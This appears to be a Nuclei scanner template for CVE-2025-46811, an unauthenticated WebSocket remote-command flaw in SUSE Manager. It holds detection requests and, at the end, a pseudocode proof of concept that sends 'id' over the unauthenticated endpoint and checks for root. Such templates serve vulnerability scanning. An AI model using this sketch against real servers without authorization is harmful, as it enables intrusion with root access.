id: CVE-2025-46811-suse-manager-rce

info:
  name: SUSE Manager Unauthenticated RCE via WebSocket
  author: yourusername
  severity: critical
  description: |
    Missing authentication in SUSE Manager allows unauthenticated remote code execution via the /rhn/websocket/minion/remote-commands endpoint
  reference:
    - https://www.suse.com/security/cve/CVE-2025-46811/
  tags: rce,suse,manager,websocket,unauth

http:
  # Request 1: WebSocket upgrade on the remote-commands endpoint, sent without credentials
  - method: GET
    path:
      - "{{BaseURL}}/rhn/websocket/minion/remote-commands"
    headers:
      Upgrade: websocket
      Connection: Upgrade
      Origin: "{{BaseURL}}"
    matchers:
      - type: word
        part: header
        words:
          - "101 Switching Protocols"
        condition: and
      - type: regex
        part: header
        regex:
          - "Sec-WebSocket-Accept:"
    extractors:
      - type: regex
        name: websocket_endpoint
        regex:
          - '(wss?://[^\s]+/rhn/websocket/minion/remote-commands)'

  # Request 2: product fingerprint via the API page
  - method: GET
    path:
      - "{{BaseURL}}/rhn/manager/api"
    matchers:
      - type: word
        words:
          - "SUSE Manager"
          - "API"
        condition: and
      - type: status
        status:
          - 200

# Author's pseudocode sketch; `rce` is not a Nuclei protocol block
rce:
  description: Proof-of-concept command execution
  payloads:
    test_cmd: "id"
  attack: websocket
  steps:
    - |
      async with websockets.connect('{{websocket_endpoint}}', ssl=False) as ws:
          await ws.send('{{test_cmd}}')
          response = await ws.recv()
          if "uid=0(root)" in response:
              return True
  matchers:
    - type: word
      words:
        - "uid=0(root)"